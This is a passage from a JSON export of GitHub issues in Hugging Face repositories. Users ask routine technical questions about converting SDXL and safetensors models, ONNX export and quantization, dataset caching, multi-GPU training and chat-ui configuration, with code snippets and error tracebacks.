"number": 4906, "title": "How to check automatically whether the image is flagged as inappropriate?", "body": "Is there a way to know whether the generated image (without seeing it) was flagged as inappropriate?", "url": "https://github.com/huggingface/diffusers/issues/4906", "state": "closed", "labels": [], "created_at": "2023-09-05T17:51:07Z", "updated_at": "2023-09-07T05:49:46Z", "user": "sarmientoj24" }, { "repo": "huggingface/diffusers", "number": 4905, "title": "How to convert a pretrained SDXL .safetensors model to the diffusers folder format", "body": "As SDXL is gaining adoption, more and more community-based models pop up that are just saved as a .safetensors file, e.g. the popular Realistic Vision: https://civitai.com/models/139562?modelVersionId=154590\r\n\r\nWhen running train_dreambooth_lora_sdxl.py, the training script expects the diffusers folder format to accelerate the text encoder, unet, etc. As far as I know, there is no possible way to use `StableDiffusionXLPipeline.from_single_file()` to do the same.\r\n\r\nIs there a way to convert an SDXL 1.0 fine-tuned .safetensors file to the diffusers folder format?\r\n\r\nI found scripts/convert_lora_safetensor_to_diffusers.py, but it doesn't seem to be applicable to SDXL.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4905", "state": "closed", "labels": [], "created_at": "2023-09-05T17:01:27Z", "updated_at": "2023-09-06T09:55:54Z", "user": "agcty" }, { "repo": "huggingface/transformers.js", "number": 280, "title": "[Question] How to run multiple pipelines or multiple models?", "body": "\r\nI am trying to transcribe from an audio source and need to do multi-language translation. I tried transcribing using Xenova/whisper- and then taking the text output and feeding it into the \"Xenova/m2m100_418M\" model, but it failed due to the multiple pipelines. Is there any way to achieve this? 
", "url": "https://github.com/huggingface/transformers.js/issues/280", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-05T11:33:44Z", "updated_at": "2023-11-01T11:32:15Z", "user": "sundarshahi" }, { "repo": "huggingface/optimum", "number": 1346, "title": "BetterTransfomer Support for the GPTBigCode model", "body": "### Feature request\n\n\r\n\r\nis it possible to support GPTBigCode with BetterTransformer?\r\n\r\nhttps://huggingface.co/docs/transformers/model_doc/gpt_bigcode\r\n\r\n\n\n### Motivation\n\n\r\nA very popular Decoder model for Code.\n\n### Your contribution\n\n\r\nhope you can achieve it. Thanks.", "url": "https://github.com/huggingface/optimum/issues/1346", "state": "closed", "labels": [], "created_at": "2023-09-04T16:52:56Z", "updated_at": "2023-09-08T14:51:17Z", "comments": 5, "user": "amarazad" }, { "repo": "huggingface/chat-ui", "number": 426, "title": "`stream` is not supported for this model", "body": "Hello Eperts,\r\nTrying to run https://github.com/huggingface/chat-ui by providing models like EleutherAI/pythia-1b, gpt2-large. With all these models, there is this consitent error\r\n{\"error\":[\"Error in `stream`: `stream` is not supported for this model\"]}\r\nAlthough I can see that hosted inference API for these models are working well from their hugging face pages like this: https://huggingface.co/gpt2-large\r\nCould someone please help?", "url": "https://github.com/huggingface/chat-ui/issues/426", "state": "open", "labels": [ "question", "models" ], "created_at": "2023-09-02T05:30:47Z", "updated_at": "2023-12-24T16:39:21Z", "user": "newUserForTesting" }, { "repo": "huggingface/diffusers", "number": 4871, "title": "How to run \"StableDiffusionXLPipeline.from_single_file\"?", "body": "I got an error when I ran the following code and it got an error on the line \"pipe = StableDiffusionXLPipeline.\" and how to solve it?\r\n\r\nnotes:\r\nI don't have a model refiner, I just want to run a model with a DIffuser XL\r\n\r\n```\r\nfrom diffusers import StableDiffusionXLPipeline, StableDiffusionXLImg2ImgPipeline\r\nimport torch\r\n\r\npipe = StableDiffusionXLPipeline.from_single_file(\r\n \"/content/model/model.safetensors\", torch_dtype=torch.float16).to(\"cuda\")\r\n\r\nimage = pipe(\r\n prompt,\r\n negative_prompt=negative_prompt,\r\n width=Width,\r\n height=Height,\r\n guidance_scale=7,\r\n target_size=(1024,1024),\r\n original_size=(4096,4096),\r\n num_inference_steps=25\r\n ).images[0]\r\n```\r\n\r\n```\r\n/usr/local/lib/python3.10/dist-packages/transformers/models/clip/feature_extraction_clip.py:28: FutureWarning: The class CLIPFeatureExtractor is deprecated and will be removed in version 5 of Transformers. 
Please use CLIPImageProcessor instead.\r\n warnings.warn(\r\n---------------------------------------------------------------------------\r\nTypeError Traceback (most recent call last)\r\n[](https://localhost:8080/#) in ()\r\n 2 import torch\r\n 3 \r\n----> 4 pipe = StableDiffusionXLPipeline.from_single_file(\r\n 5 \"/content/model/model.safetensors\", torch_dtype=torch.float16).to(\"cuda\")\r\n 6 \r\n\r\n1 frames\r\n[/usr/local/lib/python3.10/dist-packages/diffusers/pipelines/stable_diffusion/convert_from_ckpt.py](https://localhost:8080/#) in download_from_original_stable_diffusion_ckpt(checkpoint_path, original_config_file, image_size, prediction_type, model_type, extract_ema, scheduler_type, num_in_channels, upcast_attention, device, from_safetensors, stable_unclip, stable_unclip_prior, clip_stats_path, controlnet, load_safety_checker, pipeline_class, local_files_only, vae_path, vae, text_encoder, tokenizer, config_files)\r\n 1564 )\r\n 1565 else:\r\n-> 1566 pipe = pipeline_class(\r\n 1567 vae=vae,\r\n 1568 text_encoder=text_model,\r\n\r\nTypeError: StableDiffusionXLPipeline.__init__() got an unexpected keyword argument 'safety_checker'\r\n```\r\n", "url": "https://github.com/huggingface/diffusers/issues/4871", "state": "closed", "labels": [], "created_at": "2023-09-01T22:42:25Z", "updated_at": "2023-09-09T03:35:53Z", "user": "Damarcreative" }, { "repo": "huggingface/optimum", "number": 1334, "title": "Enable CLI export of decoder-only models without present outputs", "body": "### Feature request\r\n\r\nCurrently `optimum-cli export onnx` only supports exporting text-generation models with present outputs (`--task text-generation`) or with past+present outputs (``--task text-generation-with-past`). It would be useful to be able to export a variant without any caching structures if they will not be used.\r\n\r\nExample of how `--task text-generation` is not sufficient for this usecase:\r\n
\r\n\r\n```\r\noptimum-cli export onnx --model facebook/opt-125m --task text-generation TEST\r\n...\r\nValidating ONNX model TEST/decoder_model.onnx...\r\n -[\u2713] ONNX model output names match reference model (present.7.key, present.2.key, present.3.key, present.2.value, present.3.value, present.10.value, logits, present.8.key, present.0.value, present.10.key, present.1.key, present.1.value, present.11.key, present.9.value, present.6.value, present.4.value, present.7.value, present.5.value, present.5.key, present.8.value, present.9.key, present.4.key, present.6.key, present.0.key, present.11.value)\r\n - Validating ONNX Model output \"logits\":\r\n -[\u2713] (2, 16, 50272) matches (2, 16, 50272)\r\n -[x] values not close enough, max diff: 3.719329833984375e-05 (atol: 1e-05)\r\n - Validating ONNX Model output \"present.0.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.0.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.1.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.1.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.2.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.2.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.3.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.3.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.4.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[x] values not close enough, max diff: 1.8358230590820312e-05 (atol: 1e-05)\r\n - Validating ONNX Model output \"present.4.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.5.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.5.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.6.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.6.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.7.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.7.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.8.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.8.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n 
-[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.9.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.9.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.10.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.10.value\":\r\n -[\u2713] (2, 12, 16, 64) matches ", "url": "https://github.com/huggingface/optimum/issues/1334", "state": "closed", "labels": [], "created_at": "2023-09-01T15:56:27Z", "updated_at": "2023-09-13T11:43:36Z", "comments": 3, "user": "mgoin" }, { "repo": "huggingface/transformers.js", "number": 274, "title": "[Question]\u00a0How to convert to ONNX a fine-tuned model", "body": "Hi, we're playing with this library to see if it can be useful for our project. I find it very easy and well done (congratulations).\r\n\r\nThe idea is not to use it directly as a frontend library but via node.js. \r\nWe've tried scripting a model directly from HF (google/flan-t5-small) and it worked but we're having trouble using a fine-tuned model.\r\n\r\nHere what we tried. We fine-tuned a model (again google/flan-t5-small) and then converted it using the onnx script (in README.md).\r\n\r\nThe script generated the following files:\r\n\r\n```\r\nonnx/decoder_model_quantized.onnx\r\nonnx/decoder_model.onnx\r\nonnx/encoder_model_quantized.onnx\r\nonnx/encoder_model.onnx\r\nconfig.json\r\ngeneration_config.json\r\nquantize_config.json\r\nspecial_tokens_map.json\r\nspice.model\r\ntokenizer_config.json\r\ntokenizer.json\r\n```\r\n\r\nBut when we tried to use it it gave us this error:\r\n\r\n`local_files_only=true` or `env.allowRemoteModels=false` and file was not found locally at ./models/google/flan-t5-small-2/onnx/decoder_model_merged_quantized.onnx\r\n\r\nSome advice or useful doc/link? \r\nThanks", "url": "https://github.com/huggingface/transformers.js/issues/274", "state": "open", "labels": [ "question" ], "created_at": "2023-09-01T15:27:21Z", "updated_at": "2023-09-01T16:12:12Z", "user": "mrddter" }, { "repo": "huggingface/datasets", "number": 6203, "title": "Support loading from a DVC remote repository", "body": "### Feature request\n\nAdding support for loading a file from a DVC repository, tracked remotely on a SCM.\n\n### Motivation\n\nDVC is a popular version control system to version and manage datasets. The files are stored on a remote object storage platform, but they are tracked using Git. Integration with DVC is possible through the `DVCFileSystem`.\r\n\r\nI have a Gitlab repository where multiple files are tracked using DVC and stored in a GCP bucket. I would like to be able to load these files using `datasets` directly using an URL. My goal is to write a generic code that abstracts the storage layer, such that my users will only have to pass in an `fsspec`-compliant URL and the corresponding files will be loaded.\n\n### Your contribution\n\nI managed to instantiate a `DVCFileSystem` pointing to a Gitlab repo from a `fsspec` chained URL in [this pull request](https://github.com/iterative/dvc/pull/9903) to DVC. 
\r\n\r\n```python\r\nfrom fsspec.core import url_to_fs\r\n\r\nfs, _ = url_to_fs(\"dvc::https://gitlab.com/repository/group/my-repo\")\r\n```\r\n\r\nFrom here I'm not sure how to continue. It seems that `datasets` expects the URL to be fully qualified, like so: `dvc::https://gitlab.com/repository/group/my-repo/my-folder/my-file.json`, but this fails because `DVCFileSystem` expects the URL to point to the root of an SCM repo. Is there a way to make this work with `datasets`?", "url": "https://github.com/huggingface/datasets/issues/6203", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-09-01T14:04:52Z", "updated_at": "2023-09-15T15:11:27Z", "comments": 4, "user": "bilelomrani1" }, { "repo": "huggingface/optimum", "number": 1328, "title": "Documentation for OpenVINO missing half()", "body": "### System Info\n\n```shell\nN/A\n```\n\n\n### Who can help?\n\n@echarlaix \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nThe documentation for OpenVINO does not have any information about using `half()` to run models on GPU. The docs used to have this information, but it was removed. \r\n\r\nIs this not required anymore? I.e. perhaps `model.to(\"GPU\")` does this automatically? If so, how would one run on GPU with FP32 precision?\n\n### Expected behavior\n\nhalf() documented with a small example", "url": "https://github.com/huggingface/optimum/issues/1328", "state": "closed", "labels": [ "bug" ], "created_at": "2023-08-31T20:44:28Z", "updated_at": "2023-08-31T20:46:34Z", "comments": 1, "user": "ngaloppo" }, { "repo": "huggingface/autotrain-advanced", "number": 249, "title": "How to save the model locally after SFT", "body": "I am wondering how to save the model locally after SFT.", "url": "https://github.com/huggingface/autotrain-advanced/issues/249", "state": "closed", "labels": [], "created_at": "2023-08-31T14:59:04Z", "updated_at": "2023-08-31T17:01:44Z", "user": "Diego0511" }, { "repo": "huggingface/chat-ui", "number": 425, "title": "Is it possible to modify it so that .env.local environment variables are set at runtime?", "body": "Currently, every deployment of Chat-UI requires rebuilding the Docker image with different .env.local environment variables. Is it theoretically possible to have one image that can be used for all deployments, with different secrets passed at runtime? Which environment variables are truly needed at build time, and for what reason, for Chat-UI to function? In #204 it says `HF_ACCESS_TOKEN` is needed at build time, but what if we use `OPENID` authentication instead? 
Is there anything else blocking this type of use case?", "url": "https://github.com/huggingface/chat-ui/issues/425", "state": "open", "labels": [ "enhancement", "back", "hacktoberfest" ], "created_at": "2023-08-31T12:55:17Z", "updated_at": "2024-03-14T20:05:38Z", "comments": 4, "user": "martinkozle" }, { "repo": "huggingface/text-generation-inference", "number": 959, "title": "How to enter the docker image to modify the environment", "body": "### System Info\n\ndokcer image: ghcr.io/huggingface/text-generation-inference:1.0.2\n\n### Information\n\n- [X] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [X] My own modifications\n\n### Reproduction\n\nI want to enter the image to modify the environment\uff0clike: tiktoken.\r\n\r\n`docker run -it ghcr.io/huggingface/text-generation-inference:1.0.2 /bin/bash`\r\n\r\nI get:\r\nerror: unexpected argument '/bin/bash' found\r\nUsage: text-generation-launcher [OPTIONS]\r\n\n\n### Expected behavior\n\nno error\r\nthx!", "url": "https://github.com/huggingface/text-generation-inference/issues/959", "state": "closed", "labels": [], "created_at": "2023-08-31T11:14:13Z", "updated_at": "2023-08-31T20:12:55Z", "user": "Romaosir" }, { "repo": "huggingface/safetensors", "number": 352, "title": "Attempt to convert `PygmalionAI/pygmalion-2.7b` to `safetensors`", "body": "### System Info\n\n- `transformers` version: 4.32.1\r\n- Platform: Linux-5.15.0-1039-gcp-x86_64-with-glibc2.31\r\n- Python version: 3.9.5\r\n- Huggingface_hub version: 0.16.4\r\n- Safetensors version: 0.3.3\r\n- Accelerate version: 0.20.3\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.0.1+cu118 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: no\r\n- Using distributed or parallel set-up in script?: no\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Reproduction\n\nHey guys I am trying to save the `PygmalionAI/pygmalion-2.7b` weights to `safetensors`. Based on [this thread](https://github.com/huggingface/text-generation-inference/issues/922#issuecomment-1698942643) I have manually downloaded the [weights](https://huggingface.co/PygmalionAI/pygmalion-2.7b/resolve/main/pytorch_model.bin) and tried to run the following:\r\n```\r\nweights = torch.load(\"pytorch_model.bin\")\r\nweights = {k: v.clone().contiguous() for k, v in weights.items()}\r\nsave_file(weights, \"model.safetensors\")\r\n```\r\nand everything went well. However, when trying to load the model I encounter the following issue:\r\n```\r\nAttributeError: 'NoneType' object has no attribute 'get'\r\n```\r\nI inspected the files and can't figure out what goes wrong... 
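\r\n\r\n(A hedged guess: when loading a safetensors checkpoint, `transformers` calls `.get(\"format\")` on the file's header metadata, and `save_file` writes no metadata unless asked to, which would produce exactly this `'NoneType' object has no attribute 'get'`. A sketch of the conversion with the metadata included:)\r\n\r\n```python\r\nimport torch\r\nfrom safetensors.torch import save_file\r\n\r\nweights = torch.load(\"pytorch_model.bin\", map_location=\"cpu\")\r\nweights = {k: v.clone().contiguous() for k, v in weights.items()}\r\n\r\n# declare the tensor format in the header so loaders can dispatch on it\r\nsave_file(weights, \"model.safetensors\", metadata={\"format\": \"pt\"})\r\n```\r\n\r\n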
I have pushed everything to `https://huggingface.co/JulesBelveze/pygmalion-2.7b-safetensors`\r\n\r\nAny recommendation on how to proceed would be awesome \ud83e\udd13 \r\nCheers!\n\n### Expected behavior\n\nExpecting the following code snippet to properly load the model (and not throw the above error):\r\n```\r\nfrom transformers import AutoModelForCausalLM\r\nmodel = AutoModelForCausalLM.from_pretrained(\"JulesBelveze/pygmalion-2.7b-safetensors\")\r\n```\r\n", "url": "https://github.com/huggingface/safetensors/issues/352", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-08-31T10:25:19Z", "updated_at": "2023-12-11T01:48:45Z", "comments": 2, "user": "JulesBelveze" }, { "repo": "huggingface/autotrain-advanced", "number": 246, "title": "How to load the fine-tuned model locally?", "body": "Hi,\r\nThanks for your super convenient package; it makes it easier for rookies like me to fine-tune a new model. However, as a rookie, I don't really know how to load my fine-tuned model and apply it. \r\nI was fine-tuning in Google Colab and downloaded the model to my PC, but I don't know how to call it. \r\nThanks!", "url": "https://github.com/huggingface/autotrain-advanced/issues/246", "state": "closed", "labels": [], "created_at": "2023-08-31T08:15:11Z", "updated_at": "2023-12-18T15:31:11Z", "user": "kennyluke1023" }, { "repo": "huggingface/diffusers", "number": 4849, "title": "How to use multiple GPUs to train textual inversion?", "body": "\r\nI am training the textual inversion fine-tuning cat toy example from [here](https://github.com/huggingface/diffusers/tree/main/examples/textual_inversion).\r\n\r\nMy env:\r\ndiffusers: 0.20.0\r\ntorch: 1.12.1+cu113\r\naccelerate: 0.22.0\r\n\r\nTraining script, as follows:\r\n\r\n```\r\nCUDA_VISIBLE_DEVICES=\"0,1,2,3\" python -u textual_inversion.py --pretrained_model_name_or_path=$MODEL_NAME --train_data_dir=$DATA_DIR --learnable_property=\"object\" --placeholder_token=\"\" --initializer_token=\"toy\" --resolution=512 --train_batch_size=1 --gradient_accumulation_steps=4 --max_train_steps=3000 --learning_rate=5.0e-04 --scale_lr --lr_scheduler=\"constant\" --lr_warmup_steps=0 --output_dir=\"textual_inversion_cat\"\r\n```\r\n\r\nBut it only trains on cuda:0. Is there any way to solve the problem of training on multiple GPUs? Thanks.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4849", "state": "closed", "labels": [], "created_at": "2023-08-31T02:56:39Z", "updated_at": "2023-09-11T01:07:49Z", "user": "Adorablepet" }, { "repo": "huggingface/chat-ui", "number": 423, "title": "AI response appears without user message, then both appear after refresh.", "body": "I was experimenting with my own back-end and wanted to get a feel for the interface. 
Here is what my code looks like:\r\n```py\r\nimport json\r\nimport random\r\nfrom fastapi import FastAPI, Request\r\nfrom fastapi.responses import Response, StreamingResponse\r\n\r\napp = FastAPI()\r\n\r\n\r\nasync def yielder():\r\n yield \"data:\" + json.dumps(\r\n {\r\n \"details\": {\r\n \"finish_reason\": \"length\",\r\n \"generated_tokens\": 1,\r\n \"seed\": None,\r\n },\r\n \"generated_text\": \"what is happening\",\r\n \"token\": {\"id\": random.randrange(0, 2**32), \"logprob\": -0.34, \"special\": False, \"text\": \"it's alive!\"},\r\n },separators=(',', ':')\r\n ) + \"\\n\\n\\n\"\r\n\r\n\r\n@app.post(\"/generate\")\r\n@app.post(\"/\")\r\nasync def generate(request: Request):\r\n reqj = await request.json()\r\n print(reqj)\r\n return StreamingResponse(\r\n yielder(),\r\n media_type=\"text/event-stream\",\r\n headers={\"Content-Type\": \"text/event-stream\"},\r\n )\r\n```\r\nUpon sending a message, \"hi\", I get this:\r\n![image](https://github.com/huggingface/chat-ui/assets/40547702/f3751e35-81a0-4a2d-8e85-2063b3df41c0) \r\nAfter refreshing the page, everything is rendered properly: \r\n![image](https://github.com/huggingface/chat-ui/assets/40547702/b18ce772-b0a4-4959-8d96-346a79aebe6d)\r\n\r\nWhat's going on? \r\nHere is what I used as a reference, which was recommended to me on the HF Discord: [link](https://github.com/gururise/openai_text_generation_inference_server/blob/main/server.py) \r\nThanks in advance.", "url": "https://github.com/huggingface/chat-ui/issues/423", "state": "closed", "labels": [], "created_at": "2023-08-30T19:04:14Z", "updated_at": "2023-09-13T19:44:23Z", "comments": 5, "user": "konst-aa" }, { "repo": "huggingface/datasets", "number": 6195, "title": "Force to reuse cache at given path", "body": "### Describe the bug\n\nI have run the official example of MLM like:\r\n\r\n```bash\r\n python run_mlm.py \\\r\n --model_name_or_path roberta-base \\\r\n --dataset_name togethercomputer/RedPajama-Data-1T \\\r\n --dataset_config_name arxiv \\\r\n --per_device_train_batch_size 10 \\\r\n --preprocessing_num_workers 20 \\\r\n --validation_split_percentage 0 \\\r\n --cache_dir /project/huggingface_cache/datasets \\\r\n --line_by_line \\\r\n --do_train \\\r\n --pad_to_max_length \\\r\n --output_dir /project/huggingface_cache/test-mlm\r\n```\r\nit successfully runs and at my cache folder has `cache-1982fea76aa54a13_00001_of_00020.arrow`..... `cache-1982fea76aa54a13_00020_of_00020.arrow ` as tokenization cache of `map` method. And the cache works fine every time I run the command above.\r\n\r\nHowever, when I switched to jupyter notebook (since I do not want to load datasets every time when I changed other parameters not related to the dataloading). It is not recognizing the cache files and starts to re-run the entire tokenization process. 
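\r\n\r\n(A hedged explanation of why this can happen: the cache file a `map` call reuses is keyed on a fingerprint that `datasets` computes by hashing the function and its arguments, and a function re-defined inside a notebook cell usually hashes differently from the one defined in `run_mlm.py`, so the lookup misses. The hash can be inspected directly:)\r\n\r\n```python\r\nfrom datasets.fingerprint import Hasher\r\n\r\n# if this value differs between the script run and the notebook run,\r\n# the two map() calls cannot share a cache file\r\nprint(Hasher.hash(tokenize_function))\r\n```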
\r\n\r\nI changed my code to \r\n```python\r\ntokenized_datasets = raw_datasets[\"train\"].map(\r\n tokenize_function,\r\n batched=True,\r\n num_proc=data_args.preprocessing_num_workers,\r\n remove_columns=[text_column_name],\r\n load_from_cache_file=True,\r\n desc=\"Running tokenizer on dataset line_by_line\",\r\n # cache_file_names= {\"train\": \"cache-1982fea76aa54a13.arrow\"}\r\n cache_file_name=\"cache-1982fea76aa54a13.arrow\",\r\n new_fingerprint=\"1982fea76aa54a13\"\r\n )\r\n```\r\nit still does not recognize the previously cached files and trying to re-run the tokenization process.\n\n### Steps to reproduce the bug\n\nuse jupyter notebook for dataset map function.\n\n### Expected behavior\n\nthe map function accepts the given cache_file_name and new_fingerprint then load the previously cached files.\n\n### Environment info\n\n- `datasets` version: 2.14.4.dev0\r\n- Platform: Linux-3.10.0-1160.59.1.el7.x86_64-x86_64-with-glibc2.10\r\n- Python version: 3.8.8\r\n- Huggingface_hub version: 0.16.4\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 2.0.3", "url": "https://github.com/huggingface/datasets/issues/6195", "state": "closed", "labels": [], "created_at": "2023-08-30T18:44:54Z", "updated_at": "2023-11-03T10:14:21Z", "comments": 2, "user": "Luosuu" }, { "repo": "huggingface/trl", "number": 713, "title": "How to use custom evaluate function with multi-gpu deepspeed", "body": "I am trying to use `deepspeed` multi-gpu training with `SFTTrainer` for a hh-rlhf. My modified trainer looks something like this\r\n```python\r\nclass SFTCustomEvalTrainer(SFTTrainer):\r\n\r\n def evaluate(\r\n self,\r\n eval_dataset = None,\r\n ignore_keys = None,\r\n metric_key_prefix: str = \"eval\",\r\n ):\r\n breakpoint()\r\n .... custom eval code\r\n```\r\nHowever, I only want to run one instance of evaluate on the 0th GPU. When using `--nproc_per_node 2`, I get two processes entering the breakpoint in customized `evaluate` function. How can I restrict deepspeed to only use one GPU for evaluation and multi-gpu for training?", "url": "https://github.com/huggingface/trl/issues/713", "state": "closed", "labels": [], "created_at": "2023-08-30T17:33:40Z", "updated_at": "2023-11-10T15:05:23Z", "user": "abaheti95" }, { "repo": "huggingface/optimum", "number": 1323, "title": "Optimisation and Quantisation for Translation models / tasks", "body": "### Feature request\n\nCurrently, the opimisation and quantisation functions look for mode.onnx in a folder, and will perform opt and quant on those files. When exporting a translation targeted ONNX, multiple files for encoding and decoding, and these can't be optimised or quantised. \r\n\r\nI've tried a hacky approach to change names of each of these files and then applying opt and quant, and this fails. 
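\r\n\r\n(A per-file fallback sketch, below the `optimum` level: `onnxruntime`'s dynamic quantizer operates on one ONNX file at a time, so it can be pointed at each exported sub-graph separately. Whether the resulting files still load through `optimum` is not guaranteed, and the file names below assume the exporter's usual seq2seq layout:)\r\n\r\n```python\r\nfrom pathlib import Path\r\nfrom onnxruntime.quantization import QuantType, quantize_dynamic\r\n\r\n# one file per sub-graph, as produced by the ONNX export of a translation model\r\nfor name in [\"encoder_model.onnx\", \"decoder_model.onnx\", \"decoder_with_past_model.onnx\"]:\r\n    src = Path(\"onnx\") / name\r\n    dst = src.with_name(src.stem + \"_quantized.onnx\")\r\n    quantize_dynamic(str(src), str(dst), weight_type=QuantType.QInt8)\r\n```\r\n\r\n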
I suspect it's more than just namings.\r\n\r\nIs it possible to optimise and quant translation ONNX files in future?\n\n### Motivation\n\nI would like to get smaller more efficient translation models\n\n### Your contribution\n\nNothing really that I can contribute to building the solution, as I don't have that level of experience and understanding.", "url": "https://github.com/huggingface/optimum/issues/1323", "state": "closed", "labels": [], "created_at": "2023-08-30T06:36:17Z", "updated_at": "2023-09-29T00:47:39Z", "comments": 2, "user": "gidzr" }, { "repo": "huggingface/datasets", "number": 6193, "title": "Dataset loading script method does not work with .pyc file", "body": "### Describe the bug\n\nThe huggingface dataset library specifically looks for \u2018.py\u2019 file while loading the dataset using loading script approach and it does not work with \u2018.pyc\u2019 file.\r\nWhile deploying in production, it becomes an issue when we are restricted to use only .pyc files. Is there any work around for this ?\n\n### Steps to reproduce the bug\n\n1. Create a dataset loading script to read the custom data.\r\n2. compile the code to make sure that .pyc file is created \r\n3. Delete the loading script and re-run the code. Usually, python should make use of complied .pyc files. However, in this case, the dataset library errors out with the message that it's unable to find the data loader loading script.\n\n### Expected behavior\n\nThe code should make use of .pyc file and run without any error.\n\n### Environment info\n\nNA", "url": "https://github.com/huggingface/datasets/issues/6193", "state": "open", "labels": [], "created_at": "2023-08-29T19:35:06Z", "updated_at": "2023-08-31T19:47:29Z", "comments": 3, "user": "riteshkumarumassedu" }, { "repo": "huggingface/transformers.js", "number": 270, "title": "[Question] How to stop warning log", "body": "I am using NodeJS to serve a translation model.\r\nThere are so many warning log when translation processing. How to stop this?\r\n`2023-08-29 23:04:32.061 node[3167:31841] 2023-08-29 23:04:32.061977 [W:onnxruntime:, graph.cc:3490 CleanUnusedInitializersAndNodeArgs] Removing initializer '/model/decoder/layers.2/encoder_attn_layer_norm/Constant_output_0'. It is not used by any node and should be removed from the model.\r\n2023-08-29 23:04:32.061 node[3167:31841] 2023-08-29 23:04:32.061987 [W:onnxruntime:, graph.cc:3490 CleanUnusedInitializersAndNodeArgs] Removing initializer '/model/decoder/layers.0/encoder_attn_layer_norm/Constant_output_0'. It is not used by any node and should be removed from the model.\r\n2023-08-29 23:04:32.062 node[3167:31841] 2023-08-29 23:04:32.061997 [W:onnxruntime:, graph.cc:3490 CleanUnusedInitializersAndNodeArgs] Removing initializer '/model/decoder/layers.4/self_attn_layer_norm/Constant_1_output_0'. It is not used by any node and should be removed from the model.`", "url": "https://github.com/huggingface/transformers.js/issues/270", "state": "open", "labels": [ "question" ], "created_at": "2023-08-29T16:08:41Z", "updated_at": "2025-08-02T15:48:45Z", "user": "tuannguyen90" }, { "repo": "huggingface/chat-ui", "number": 420, "title": "Error: ENOSPC: System limit for number of file watchers reached", "body": "Error: ENOSPC: System limit for number of file watchers reached, watch '/home/alvyn/chat-ui/vite.config.ts'\r\n at FSWatcher. 
